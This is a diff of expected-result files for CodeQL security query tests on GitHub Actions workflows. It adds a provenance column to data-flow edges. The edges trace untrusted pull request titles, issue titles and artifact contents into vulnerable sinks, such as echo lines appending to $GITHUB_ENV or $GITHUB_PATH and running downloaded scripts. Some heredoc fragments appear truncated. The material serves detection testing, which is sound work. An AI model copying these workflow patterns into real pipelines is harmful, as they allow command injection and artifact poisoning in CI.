steps.changed-files.outputs.all_changed_files | provenance | | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | provenance | | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | provenance | | nodes | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected index 063a26bd6ef..067edb68bb1 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected @@ -1,7 +1,7 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | -| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | -| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected index a45b9acf416..f2178960774 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected @@ -1,5 +1,5 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | provenance | | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected index 2cabeaca9fa..c76034f74d4 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected @@ -1,7 +1,7 @@ edges -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | -| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | provenance | | nodes | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | semmle.label | jobs.job1.outputs.job-output2 | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected index a6be99e1bd0..8589d82d825 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected @@ -1,9 +1,9 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | -| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | -| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index c6091f1fc23..7fab238795c 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected @@ -1,10 +1,10 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index d3b90de71e3..ea360bc56df 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected @@ -1,10 +1,10 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index ffaaf91e550..0dbff955318 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -1,16 +1,16 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 28fffe0e5e4..5641ea53afd 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,16 +1,16 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index f7b4ae7bc11..fdb5beb09aa 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,84 +1,84 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 193eee3b66c..a18aa5bdc80 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,17 +1,17 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| 